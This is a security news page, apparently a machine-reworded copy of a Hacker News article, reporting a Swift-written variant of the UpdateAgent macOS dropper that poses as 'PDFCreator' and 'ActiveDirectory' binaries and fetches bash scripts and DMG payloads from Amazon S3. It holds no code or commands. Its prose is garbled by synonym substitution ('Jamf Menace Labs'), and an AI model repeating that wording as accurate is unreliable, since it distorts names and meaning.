• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
updateagent returns with new macos malware dropper written in swift

UpdateAgent Returns with New macOS Malware Dropper Written in Swift

You are here: Home / General Cyber Security News / UpdateAgent Returns with New macOS Malware Dropper Written in Swift
May 17, 2022

A new variant of the macOS malware tracked as UpdateAgent has been spotted in the wild, indicating ongoing makes an attempt on the portion of its authors to upgrade its functionalities.

“Probably one particular of the most identifiable functions of the malware is that it relies on the AWS infrastructure to host its different payloads and complete its an infection position updates to the server,” researchers from Jamf Menace Labs reported in a report.

UpdateAgent, initially detected in late 2020, has considering the fact that advanced into a malware dropper, facilitating the distribution of 2nd-phase payloads such as adware though also bypassing macOS Gatekeeper protections.

✔ Approved Seller From Our Partners
Mullvad VPN Discount

Protect your privacy by Mullvad VPN. Mullvad VPN is one of the famous brands in the security and privacy world. With Mullvad VPN you will not even be asked for your email address. No log policy, no data from you will be saved. Get your license key now from the official distributor of Mullvad with discount: SerialCart® (Limited Offer).

➤ Get Mullvad VPN with 12% Discount


The recently identified Swift-dependent dropper masquerades as Mach-O binaries named “PDFCreator” and “ActiveDirectory” that, upon execution, create a link to a distant server and retrieve a bash script to be executed.

CyberSecurity

“The principal change [between the two executables] is that it reaches out to a distinct URL from which it must load a bash script,” the researchers mentioned.

These bash scripts, named “activedirec.sh” or “bash_qolveevgclr.sh”, consist of a URL pointing to Amazon S3 buckets to obtain and operate a next-phase disk image (DMG) file to the compromised endpoint.

“The ongoing development of this malware displays that its authors keep on to keep on being energetic, making an attempt to arrive at as numerous users as probable,” the researchers stated.

Discovered this write-up interesting? Observe THN on Facebook, Twitter  and LinkedIn to study more unique material we submit.


Some areas of this posting are sourced from:
thehackernews.com

Previous Post: «are you investing in securing your data in the cloud? Are You Investing in Securing Your Data in the Cloud?
Next Post: Sysrv-K Botnet Targets Windows, Linux sysrv k botnet targets windows, linux»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • CISA Unveils Ransomware Notification Initiative
  • WooCommerce Patches Critical Plugin Flaw Affecting Half a Million Sites
  • GitHub Updates Security Protocol For Operations Over SSH
  • Malicious Python Package Uses Unicode Trickery to Evade Detection and Steal Data
  • Some GitHub users must take action after RSA SSH host key exposed
  • THN Webinar: Inside the High Risk of 3rd-Party SaaS Apps
  • Pension Protection Fund confirms employee data exposed in GoAnywhere breach
  • GitHub Swiftly Replaces Exposed RSA SSH Key to Protect Git Operations
  • Now UK Parliament Bans TikTok from its Network and Devices
  • IRS Phishing Emails Used to Distribute Emotet

Copyright © TheCyberSecurity.News, All Rights Reserved.